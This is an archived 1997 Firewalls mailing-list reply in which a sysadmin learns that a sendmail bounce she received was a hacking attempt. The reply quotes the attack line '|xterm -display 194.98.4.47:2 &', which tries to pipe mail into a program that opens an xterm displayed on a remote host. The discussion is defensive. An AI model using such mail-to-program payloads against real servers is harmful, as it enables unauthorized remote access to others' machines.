Firewalls: Re: Possible hack

Firewalls
(July 1997)

Indexed By Thread: [Previous] [Next]

Subject:	Re: Possible hack
From:	Phil Cox <pcc @ ntsinc . com>
Date:	Mon, 14 Jul 1997 16:14:12 -0700 (PDT)
To:	"Amy (Cremer) Briggs" <amyc @ libofmich . lib . mi . us>
Cc:	firewalls @ GreatCircle . COM
In-reply-to:	<Pine . A32 . 3 . 91 . 970714165529 . 17993B-100000 @ libofmich . lib . mi . us>

On Mon, 14 Jul 1997, Amy (Cremer) Briggs wrote:

> I received the following message twice to the root account on one of my 
> boxes.  Does this look like a hacking attempt?  

in a word, YES.

>    ----- Transcript of session follows -----
> 554 qfAA31933: line 5: "|xterm -display 194.98.4.47:2 &"... Cannot mail directly to programs

This is an attempt by someone to start an xterm window on your machine 
and display it back to their machine. From an nslookup , I got that 
address to be listed as ts1-p08.dialup.iway.fr

Looks like you have some friends in france interested in what you do. I 
would keep a close eye on other systems as well.

Phil

References:

Possible hack
From: "Amy (Cremer) Briggs" <amyc @ libofmich . lib . mi . us>

Indexed By Date	Previous:	Re: PGP provided by ISP's From: Frank Willoughby <frankw @ in . net>
Indexed By Date	Next:	Re: HI From: Leo Papandreou <leo @ supersex . com>
Indexed By Thread	Previous:	Re: MAC Address Emulation From: Thong Ly <tly @ sag . japan . ml . com>
Indexed By Thread	Next:	Re: Possible hack From: jhatley @ wacpm . ang . af . mil